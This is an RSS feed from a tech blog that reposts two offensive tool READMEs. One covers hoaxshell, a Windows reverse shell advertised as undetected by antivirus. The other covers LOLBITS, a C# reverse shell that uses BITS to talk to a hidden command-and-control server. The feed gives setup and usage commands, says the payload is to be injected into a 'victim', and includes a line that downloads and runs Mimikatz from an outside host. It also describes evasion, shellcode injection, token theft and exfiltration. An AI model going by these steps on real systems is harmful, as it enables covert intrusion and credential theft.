<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>reverse shell Archives - Tech Chronicles</title>
	<atom:link href="http://kostacipo.stream/tag/reverse-shell/feed/" rel="self" type="application/rss+xml" />
	<link>https://kostacipo.stream/tag/reverse-shell/</link>
	<description>Ramblings of a Tech Dude</description>
	<lastBuildDate>Mon, 23 Jan 2023 19:15:12 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.8.2</generator>

<image>
	<url>https://kostacipo.stream/wp-content/uploads/2019/12/cropped-profile-32x32.jpg</url>
	<title>reverse shell Archives - Tech Chronicles</title>
	<link>https://kostacipo.stream/tag/reverse-shell/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>hoaxshell &#8211; An unconventional Windows reverse shell</title>
		<link>http://kostacipo.stream/hoaxshell-an-unconventional-windows-reverse-shell/</link>
					<comments>http://kostacipo.stream/hoaxshell-an-unconventional-windows-reverse-shell/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Mon, 23 Jan 2023 19:15:12 +0000</pubDate>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[reverse shell]]></category>
		<category><![CDATA[windows]]></category>
		<guid isPermaLink="false">https://kostacipo.stream/?p=2139</guid>

					<description><![CDATA[<p>Currently undetected by Microsoft Defender and various other AV solutions, solely based on http(s) traffic. Purpose hoaxshell is an unconventional Windows reverse shell, currently undetected by Microsoft Defender and possibly other AV solutions as it is solely based on http(s) traffic. The tool is easy to use, it generates its own PowerShell payload and it [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/hoaxshell-an-unconventional-windows-reverse-shell/">hoaxshell &#8211; An unconventional Windows reverse shell</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h3>Currently undetected by Microsoft Defender and various other AV solutions, solely based on http(s) traffic.</h3>
<h2 dir="auto"><strong>Purpose</strong></h2>
<p dir="auto">hoaxshell is an unconventional Windows reverse shell, currently undetected by Microsoft Defender and possibly other AV solutions as it is solely based on http(s) traffic. The tool is easy to use, it generates its own PowerShell payload and it supports encryption (ssl).</p>
<p dir="auto">So far, it has been tested on fully updated <strong>Windows 11 Enterprise</strong> and <strong>Windows 10 Pro</strong> boxes (see video and screenshots).</p>
<p dir="auto">More: <a href="https://github.com/t3l3machus/hoaxshell" target="_blank" rel="noopener">https://github.com/t3l3machus/hoaxshell</a></p>
<h3 dir="auto"><a id="user-content-video-presentation" class="anchor" href="https://github.com/t3l3machus/hoaxshell#video-presentation" target="_blank" rel="noopener" aria-hidden="true"></a><strong>Video Presentation</strong></h3>
<p dir="auto"><iframe src="//www.youtube.com/embed/SEufgD5UxdU" width="560" height="314" allowfullscreen="allowfullscreen"></iframe></p>
<h2 dir="auto"><a id="user-content-screenshots" class="anchor" href="https://github.com/t3l3machus/hoaxshell#screenshots" target="_blank" rel="noopener" aria-hidden="true"></a><strong>Screenshots </strong></h2>
<p><a href="https://hakin9.org/wp-content/uploads/2022/08/68747470733a2f2f7261772e6769746875622e636f6d2f74336c336d61636875732f686f61787368656c6c2f6d61737465722f73637265656e73686f74732f686f61787368656c6c2d77696e31312d76322e706e67.png"><img fetchpriority="high" decoding="async" class="alignnone size-full wp-image-242868" src="https://hakin9.org/wp-content/uploads/2022/08/68747470733a2f2f7261772e6769746875622e636f6d2f74336c336d61636875732f686f61787368656c6c2f6d61737465722f73637265656e73686f74732f686f61787368656c6c2d77696e31312d76322e706e67.png" sizes="(max-width: 841px) 100vw, 841px" srcset="https://hakin9.org/wp-content/uploads/2022/08/68747470733a2f2f7261772e6769746875622e636f6d2f74336c336d61636875732f686f61787368656c6c2f6d61737465722f73637265656e73686f74732f686f61787368656c6c2d77696e31312d76322e706e67.png 841w, https://hakin9.org/wp-content/uploads/2022/08/68747470733a2f2f7261772e6769746875622e636f6d2f74336c336d61636875732f686f61787368656c6c2f6d61737465722f73637265656e73686f74732f686f61787368656c6c2d77696e31312d76322e706e67-460x418.png 460w, https://hakin9.org/wp-content/uploads/2022/08/68747470733a2f2f7261772e6769746875622e636f6d2f74336c336d61636875732f686f61787368656c6c2f6d61737465722f73637265656e73686f74732f686f61787368656c6c2d77696e31312d76322e706e67-768x698.png 768w, https://hakin9.org/wp-content/uploads/2022/08/68747470733a2f2f7261772e6769746875622e636f6d2f74336c336d61636875732f686f61787368656c6c2f6d61737465722f73637265656e73686f74732f686f61787368656c6c2d77696e31312d76322e706e67-500x454.png 500w, https://hakin9.org/wp-content/uploads/2022/08/68747470733a2f2f7261772e6769746875622e636f6d2f74336c336d61636875732f686f61787368656c6c2f6d61737465722f73637265656e73686f74732f686f61787368656c6c2d77696e31312d76322e706e67-200x182.png 200w, https://hakin9.org/wp-content/uploads/2022/08/68747470733a2f2f7261772e6769746875622e636f6d2f74336c336d61636875732f686f61787368656c6c2f6d61737465722f73637265656e73686f74732f686f61787368656c6c2d77696e31312d76322e706e67-378x343.png 378w, https://hakin9.org/wp-content/uploads/2022/08/68747470733a2f2f7261772e6769746875622e636f6d2f74336c336d61636875732f686f61787368656c6c2f6d61737465722f73637265656e73686f74732f686f61787368656c6c2d77696e31312d76322e706e67-565x513.png 565w, https://hakin9.org/wp-content/uploads/2022/08/68747470733a2f2f7261772e6769746875622e636f6d2f74336c336d61636875732f686f61787368656c6c2f6d61737465722f73637265656e73686f74732f686f61787368656c6c2d77696e31312d76322e706e67-120x109.png 120w, https://hakin9.org/wp-content/uploads/2022/08/68747470733a2f2f7261772e6769746875622e636f6d2f74336c336d61636875732f686f61787368656c6c2f6d61737465722f73637265656e73686f74732f686f61787368656c6c2d77696e31312d76322e706e67-310x282.png 310w" alt="" width="841" height="764" /></a></p>
<p dir="auto">Find more screenshots <a href="https://github.com/t3l3machus/hoaxshell/blob/main/screenshots" target="_blank" rel="noopener">here</a>.</p>
<h2 dir="auto"><a id="user-content-installation" class="anchor" href="https://github.com/t3l3machus/hoaxshell#installation" target="_blank" rel="noopener" aria-hidden="true"></a><strong>Installation</strong></h2>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto">
<pre class="notranslate"><code>git clone https://github.com/t3l3machus/hoaxshell
cd ./hoaxshell
sudo pip3 install -r requirements.txt
chmod +x hoaxshell.py
</code></pre>
<h2 dir="auto"><a id="user-content-usage" class="anchor" href="https://github.com/t3l3machus/hoaxshell#usage" target="_blank" rel="noopener" aria-hidden="true"></a><strong>Usage</strong></h2>
<p dir="auto"><strong>Important</strong>: As a means of avoiding detection, hoaxshell is automatically generating random values for the session id, URL paths and name of a custom HTTP header utilized in the process, every time the script is started. The generated payload will work only for the instance it was generated for. Use the <code>-g</code> option to bypass this behavior and re-establish an active session or reuse a past generated payload with a new instance of hoaxshell.</p>
<h3 dir="auto"><a id="user-content-basic-shell-session-over-http" class="anchor" href="https://github.com/t3l3machus/hoaxshell#basic-shell-session-over-http" target="_blank" rel="noopener" aria-hidden="true"></a><strong>Basic shell session over HTTP</strong></h3>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto">
<pre class="notranslate"><code>sudo python3 hoaxshell.py -s &lt;your_ip&gt;
</code></pre>
<p dir="auto">When you run hoaxshell, it will generate its own PowerShell payload for you to copy and inject into the victim. By default, the payload is base64 encoded for convenience. If you need the payload raw, execute the &#8220;rawpayload&#8221; prompt command or start hoaxshell with the <code>-r</code> argument. After the payload has been executed on the victim, you&#8217;ll be able to run PowerShell commands against it.</p>
<h3 dir="auto"><a id="user-content-encrypted-shell-session-https" class="anchor" href="https://github.com/t3l3machus/hoaxshell#encrypted-shell-session-https" target="_blank" rel="noopener" aria-hidden="true"></a>Encrypted shell session (HTTPS):</h3>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto">
<pre class="notranslate"><code># Generate self-signed certificate:
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365

# Pass the cert.pem and key.pem as arguments:
sudo python3 hoaxshell.py -s &lt;your_ip&gt; -c &lt;/path/to/cert.pem&gt; -k &lt;path/to/key.pem&gt;

</code></pre>
<p dir="auto">The generated PowerShell payload will be longer in length because of an additional block of code that disables the SSL certificate validation.</p>
<h3 dir="auto"><a id="user-content-grab-session-mode" class="anchor" href="https://github.com/t3l3machus/hoaxshell#grab-session-mode" target="_blank" rel="noopener" aria-hidden="true"></a><strong>Grab session mode</strong></h3>
<p dir="auto">In case you close your terminal accidentally, have a power outage or something, you can start hoaxshell in grab session mode, it will attempt to re-establish a session, given that the payload is still running on the victim machine.</p>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto">
<pre class="notranslate"><code>sudo python3 hoaxshell.py -s &lt;your_ip&gt; -g
</code></pre>
<p dir="auto"><strong>Important</strong>: Make sure to start hoaxshell with the same settings as the session you are trying to restore (HTTP/HTTPS, port, etc).</p>
<h2 dir="auto"><a id="user-content-limitations" class="anchor" href="https://github.com/t3l3machus/hoaxshell#limitations" target="_blank" rel="noopener" aria-hidden="true"></a><strong>Limitations</strong></h2>
<p dir="auto">The shell is going to hang if you execute a command that initiates an interactive session. Example:</p>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto">
<pre class="notranslate"><code># this command will execute succesfully and you will have no problem: 
&gt; powershell echo 'This is a test'

# But this one will open an interactive session within the hoaxshell session and is going to cause the shell to hang:
&gt; powershell

# In the same manner, you won't have a problem executing this:
&gt; cmd /c dir /a

# But this will cause your hoaxshell to hang:
&gt; cmd.exe
</code></pre>
<p dir="auto">So, if you for example would like to run mimikatz through hoaxshell you would need to invoke the commands:</p>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto">
<pre class="notranslate"><code>hoaxshell &gt; IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.13:4443/Invoke-Mimikatz.ps1');Invoke-Mimikatz -Command '"PRIVILEGE::Debug"'
</code></pre>
<p dir="auto">Long story short, you have to be careful to not run an exe or cmd that starts an interactive session within the hoaxshell PowerShell context.</p>
</div>
</div>
</div>
</div>
</div>
</div>
<p>The post <a href="http://kostacipo.stream/hoaxshell-an-unconventional-windows-reverse-shell/">hoaxshell &#8211; An unconventional Windows reverse shell</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/hoaxshell-an-unconventional-windows-reverse-shell/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>LOLBITS &#8211; C# Reverse Shell Using Background Intelligent Transfer Service (BITS) As Communication Protocol</title>
		<link>http://kostacipo.stream/lolbits-c-reverse-shell-using-background-intelligent-transfer-service-bits-as-communication-protocol/</link>
					<comments>http://kostacipo.stream/lolbits-c-reverse-shell-using-background-intelligent-transfer-service-bits-as-communication-protocol/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Mon, 20 Jan 2020 11:04:24 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Pentesting]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[reverse shell]]></category>
		<guid isPermaLink="false">http://www.kostacipo.stream/?p=1680</guid>

					<description><![CDATA[<p>&#160; LOLBITS is a C# reverse shell that uses Microsoft&#8217;s Background Intelligent Transfer Service (BITS) to communicate with the Command and Control backend. The Command and Control backend is hidden behind an apparently harmless flask web application and it&#8217;s only accesible when the HTTP requests received by the app contain a valid authentication header.LOLBITS is [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/lolbits-c-reverse-shell-using-background-intelligent-transfer-service-bits-as-communication-protocol/">LOLBITS &#8211; C# Reverse Shell Using Background Intelligent Transfer Service (BITS) As Communication Protocol</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>&nbsp;</p>
<article>
<div id="post-body-1526209933324551002" class="post-body entry-content">LOLBITS is a C# reverse shell that uses Microsoft&#8217;s <a title="Background Intelligent Transfer Service (BITS)" href="https://docs.microsoft.com/en-us/windows/win32/bits/background-intelligent-transfer-service-portal" target="_blank" rel="nofollow noopener noreferrer">Background Intelligent Transfer Service (BITS)</a> to communicate with the Command and Control backend. The Command and Control backend is hidden behind an apparently harmless flask web application and it&#8217;s only accesible when the HTTP requests received by the app contain a valid authentication header.<br /><a name="more"></a><br /><strong>LOLBITS</strong> is composed of 3 main elements:</p>
<ol>
<li>The C# agent that is in charge of executing the commands in the compromised host, sending back the output to the C&amp;C server once the process is done.</li>
<li>The flask web application that acts as a dispatcher. This element is the one that allows to hide the C&amp;C infrastructure behind a harmless website at the same time that supplies the new commands to the agent when an authenticated request is received.</li>
<li>The C&amp;C console, used to control the agent.</li>
</ol>
<p>In order to deny proxies content inspection, all the relevant content sent between the agent and the C&amp;C server is encrypted using RC4 with a preshared secret key. A high level diagram of the infrastructure behaviour would be as it&#8217;s shown in the following diagram:</p>
<div class="separator"><a href="https://1.bp.blogspot.com/-_bk2fHxgf_4/Xh0q1Aw3KHI/AAAAAAAARbU/xA9g9jos2KgpJpw1t9tRyD26ZJK7ytBIQCNcBGAsYHQ/s1600/LOLBITS_2_diagram.png"><img decoding="async" src="https://1.bp.blogspot.com/-_bk2fHxgf_4/Xh0q1Aw3KHI/AAAAAAAARbU/xA9g9jos2KgpJpw1t9tRyD26ZJK7ytBIQCNcBGAsYHQ/s640/LOLBITS_2_diagram.png" data-original-height="396" data-original-width="738" width="640" height="342" border="0"></a></div>
<p>To avoid that the <a title="Blue Team" href="https://www.kitploit.com/search/label/Blue%20Team" target="_blank" rel="noopener noreferrer">Blue Team</a> could reproduce some of the old requests and discover the C&amp;C infrastructure, each authentication header is generated randomly and is valid only for one single cycle (a cycle is composed of a POST request followed by a GET request). Old authentication headers will be ignored and the harmless website will be displayed for those requests.</p>
<p><b>Acknowledgements</b><br />Some of this tool features have being implemented reusing code from the CyberVaca&#8217;s amazing project <a title="Salsa Tools" href="https://github.com/Hackplayers/Salsa-tools" target="_blank" rel="nofollow noopener noreferrer">Salsa Tools</a>, so a big shout-out to him! <br /><b></b></div>
<div>&nbsp;</div>
<div class="post-body entry-content"><b>Getting Started</b></p>
<p><b>Prerequisites</b><br />For the C&amp;C infrastructure is required a Windows Server 2012 or above with python 3.4+ and the following python dependencies:</p>
<ul>
<li>Colorama</li>
</ul>
<div>
<pre><code>pip install colorama</code></pre>
</div>
<ul>
<li>Flask</li>
</ul>
<div>
<pre><code>pip install flask</code></pre>
</div>
<p>The C# agent has been successfully tested on Windows Server 2016, Windows Server 2019, Windows 8.1 and Windows 10. To compile it it&#8217;s required:</p>
<ul>
<li>Visual Studio 2017 or above.</li>
<li>.NET Framework 4.5 or above.</li>
</ul>
<p><b>Setup</b><br />1.- Clone this repository on your C&amp;C server</p>
<div>
<pre><code>git clone https://github.com/Kudaes/LOLBITS.git</code></pre>
</div>
<p>2.- Install Web Server (IIS) through Windows Server Manager. Make sure to install CGI, ASP.NET and .NET Extensibility roles.</p>
<div class="separator"><a href="https://1.bp.blogspot.com/-GEtVuU0Vb3I/Xh0rFkSaOlI/AAAAAAAARbc/dW10yGVYrHQ6xrv5I5sKYOz1F81wHWwBgCNcBGAsYHQ/s1600/LOLBITS_3_iisroles.png"><img loading="lazy" decoding="async" src="https://1.bp.blogspot.com/-GEtVuU0Vb3I/Xh0rFkSaOlI/AAAAAAAARbc/dW10yGVYrHQ6xrv5I5sKYOz1F81wHWwBgCNcBGAsYHQ/s640/LOLBITS_3_iisroles.png" data-original-height="677" data-original-width="786" width="640" height="550" border="0"></a></div>
<p>Also install .NET Framework and BITS features for IIS.</p>
<div class="separator"><a href="https://1.bp.blogspot.com/-xVK5lbbdcs4/Xh0rMYNxEyI/AAAAAAAARbg/YlAGWfcuGCcX72zYaRzr-Oyx8kkHPWx_QCNcBGAsYHQ/s1600/LOLBITS_4_iisfeatures.png"><img loading="lazy" decoding="async" src="https://1.bp.blogspot.com/-xVK5lbbdcs4/Xh0rMYNxEyI/AAAAAAAARbg/YlAGWfcuGCcX72zYaRzr-Oyx8kkHPWx_QCNcBGAsYHQ/s640/LOLBITS_4_iisfeatures.png" data-original-height="444" data-original-width="758" width="640" height="374" border="0"></a></div>
<p>3.- Install wfastcgi and configure Fast CGI settings in IIS. This is required since our web application is written in Python. For this step to be done I followed up <a title="this amazing tutorial" href="https://medium.com/@rajesh.r6r/deploying-a-python-flask-rest-api-on-iis-d8d9ebf886e9" target="_blank" rel="nofollow noopener noreferrer">this amazing tutorial</a>, and I recommend you to do the same. Come back to this README when you have completed the tutorial&#8217;s steps 1 and 2.<br />4.- Stop the Default website and create a new one using Internet Information Services Manager. Enable BITS uploads for this new website.</p>
<div class="separator"><a href="https://1.bp.blogspot.com/-CQfmKpVqSW8/Xh0rRus3oOI/AAAAAAAARbk/WN5W1bDpbBIUgKKqozKUtxfkuvRcJ-rPwCNcBGAsYHQ/s1600/LOLBITS_5_bitsuploads.png"><img loading="lazy" decoding="async" src="https://1.bp.blogspot.com/-CQfmKpVqSW8/Xh0rRus3oOI/AAAAAAAARbk/WN5W1bDpbBIUgKKqozKUtxfkuvRcJ-rPwCNcBGAsYHQ/s640/LOLBITS_5_bitsuploads.png" data-original-height="687" data-original-width="916" width="640" height="480" border="0"></a></div>
<p>5.- Move <code>the content</code> of the C&amp;C folder of this repository to the physical directory where the new website is deployed. Let&#8217;s say that you have created the new website pointing to your directory <code>C:\inetpub\wwwroot\bits</code>, then this should be that directory tree:</p>
<div>
<pre><code>C:\inetpub\wwwroot\bits
     |__ /config            
          |-- auth.txt
     |__ /files
          |-- abcde1234          
          |-- default
     |__ /lolbins
          |-- base64decode.py
          |-- base64encode.py
          |-- a lot of other .py files
     |__ /templates
       |-- index.html
     |__ /static
     |__ /payloads
     |__ -- decrypt.py
     |__ -- encrypt.py
     |__ -- myapp.py
     |__ -- web.config</code></pre>
</div>
<p>I recommend to grant <strong>full access rights to Everyone</strong> for the website directory (<code>C:\inetpub\wwwroot\bits</code> in the example) in order to avoid all kind of access denied errors. At the end this is just a C&amp;C server&#8230;<br />6.- Edit the web.config file. In this file you have to modify two settings:</p>
<ul>
<li><code>scriptProcessor</code> property for the web handler. For that, go back to the IIS Manager, click on the IIS server&#8217;s root and select FastCGI Settings (you should have configured this when following the tutorial referenced on the step 3). The value of the <code>scriptProcessor</code> property should be &#8220;Full Path|Arguments&#8221;.</li>
</ul>
<div class="separator"><a href="https://1.bp.blogspot.com/-SSxMW9ipDLQ/Xh0rWDw6EgI/AAAAAAAARbs/iBAvYFNm0co_Oz3VVh7n4NeSrIpfZP1qwCNcBGAsYHQ/s1600/LOLBITS_6_fastcgi.png"><img loading="lazy" decoding="async" src="https://1.bp.blogspot.com/-SSxMW9ipDLQ/Xh0rWDw6EgI/AAAAAAAARbs/iBAvYFNm0co_Oz3VVh7n4NeSrIpfZP1qwCNcBGAsYHQ/s640/LOLBITS_6_fastcgi.png" data-original-height="231" data-original-width="943" width="640" height="156" border="0"></a></div>
<p>Acording with the previous image, my <code>scriptProcessor</code> property should have the value <strong>&#8220;c:\python3.4\python.exe|c:\python3.4\lib\site-packages\wfastcgi.py&#8221;</strong>.</p>
<ul>
<li>PYTHONPATH, that should point to your website directory, in this case it would be &#8220;C:\inetpub\wwwroot\bits&#8221;.</li>
</ul>
<p>7.- Modify the <strong>initial setup constants</strong>.</p>
<ul>
<li>Select the password to use as preshared key. Set its value in:
<ul>
<li>Program.cs -&gt; <code>Password</code> variable.</li>
<li>myapp.py -&gt; <code>Password</code> variable.</li>
<li>lawlbin.py -&gt; <code>password</code> variable.</li>
</ul>
</li>
<li>Set in the c# agent the url where the flask application is listening.
<ul>
<li>Program.cs -&gt; <code>Url</code> variable.</li>
</ul>
</li>
<li>In myapp.py, set the value of the variables <code>AuthPath</code>, <code>ReadPath</code> and <code>Payloads</code> pointing to the correponding folders in the website directory.</li>
<li>In lawlbin.py (lolbins folder) set the corresponding values for the variables <code>baseReadPath</code>and <code>baseWritePath</code> acording with your website directory tree.</li>
</ul>
<p>8.- Compile the agent and execute it in the compromised host. The compilation will generate an exe and an external dependency (<strong>Newtonsoft.Json.dll</strong>). You can generate a single exe using <a title="ILMerge" href="https://github.com/dotnet/ILMerge" target="_blank" rel="nofollow noopener noreferrer">ILMerge</a> or just send both files. To avoid DEBUG output, compile the project as a <strong>Windows Application</strong>.</p>
<div class="separator"><a href="https://1.bp.blogspot.com/-VtqM97ueZms/Xh0raP2GeCI/AAAAAAAARbw/qhABFyhTuMAhCLKhqhW9LKjIgYBPkzjQwCNcBGAsYHQ/s1600/LOLBITS_7_windowsapp.png"><img loading="lazy" decoding="async" src="https://1.bp.blogspot.com/-VtqM97ueZms/Xh0raP2GeCI/AAAAAAAARbw/qhABFyhTuMAhCLKhqhW9LKjIgYBPkzjQwCNcBGAsYHQ/s640/LOLBITS_7_windowsapp.png" data-original-height="344" data-original-width="987" width="640" height="222" border="0"></a></div>
<p><b>Usage</b><br />To obtain the reverse shell just type in <code>python lawlbin.py</code> on a cmd of the C&amp;C server and execute the C# agent on the compromised host.<br />Since this project borns from the ashes of a previous and failed project, some of the old features have been kept. The old project was a shell where all the available commands would be executed using exclusively <a title="Living of The Land Binaries" href="https://github.com/LOLBAS-Project/LOLBAS" target="_blank" rel="nofollow noopener noreferrer">Living of The Land Binaries</a>. Thats where the LOL of LOLBITS comes from, and thats why the following features run using exclusively LOLBINS (this could help to bypass AWS and some EDR filters):</p>
<ul>
<li><strong>download</strong>: Download a file from a Webdav to the compromised host.</li>
<li><strong>copy</strong>: Copy a file from a local path to another local path.</li>
<li><strong>base64encode</strong>: Use base64 encoding over the content of a local file.</li>
<li><strong>base64decode</strong>: Decode a base64 encoded file.</li>
<li><strong>compile</strong>: Compile .cs files into exe or dll.</li>
<li><strong>execute</strong>: Execute different types of files (bat, exe, xml, js, vbs, hta among others). <strong>In maintenance!! Broken ATM!!</strong></li>
<li><strong>downexec</strong>: Download a file from a webdav and execute it. <strong>In maintenance!! Broken ATM!!</strong></li>
</ul>
<p>Despite this features could be interesting in some environments (hmm downloading remote files without using Powershell? I like it!) I kept them just to reuse part of the old code for the C&amp;C console. Below is a list with some features that im sure will be more usefull in a regular situation:</p>
<ul>
<li><strong>inject</strong>: Download from the C&amp;C a shellcode (.bin) or dll (.NET assembly) file and execute it in memory. With this command the payload never touches disk unencrypted, avoiding AV detection. Shellcode injection is only implemented for 64 bits procesess. The shellcode injection can be executed on both own and remote process.</li>
<li><strong>psh</strong>: Generate a remote Powershell version 2 shell. This shell has to be handled by additional sofware like netcat (just run nc -lvp ).</li>
<li><strong>send</strong>: To send a file from your C&amp;C to the compromised host just use this option. The sent file will be store in disk, so be carefull.</li>
<li><strong>getsystem</strong>: Attempt to obtain System privileges using named pipes impersonation. High integrity process required.</li>
<li><strong>impersonate</strong>: Attempt to steal an access token from other process in order to &#8220;become&#8221; another user.</li>
<li><strong>runas</strong>: Use valid credentials to modify your security context and log in as other (local or domain) user.</li>
<li><strong>rev2self</strong>: Remove security context changes performed by getsystem, impersonate or runas.</li>
<li><strong>exfiltrate</strong>: Send a file from the compromised host to your C&amp;C.</li>
</ul>
<p>To get usage tips just type in <code>help</code> or <code>&lt;somecommand&gt; help</code>. In the future more features will be implemented, so stay tuned!</p>
<p></p>
<div><b><a class="kiploit-download" title="Download LOLBITS" href="https://github.com/Kudaes/LOLBITS" target="_blank" rel="nofollow noopener noreferrer">Download LOLBITS</a></b></div>
</div>
</article>
<p>The post <a href="http://kostacipo.stream/lolbits-c-reverse-shell-using-background-intelligent-transfer-service-bits-as-communication-protocol/">LOLBITS &#8211; C# Reverse Shell Using Background Intelligent Transfer Service (BITS) As Communication Protocol</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/lolbits-c-reverse-shell-using-background-intelligent-transfer-service-bits-as-communication-protocol/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
	</channel>
</rss>
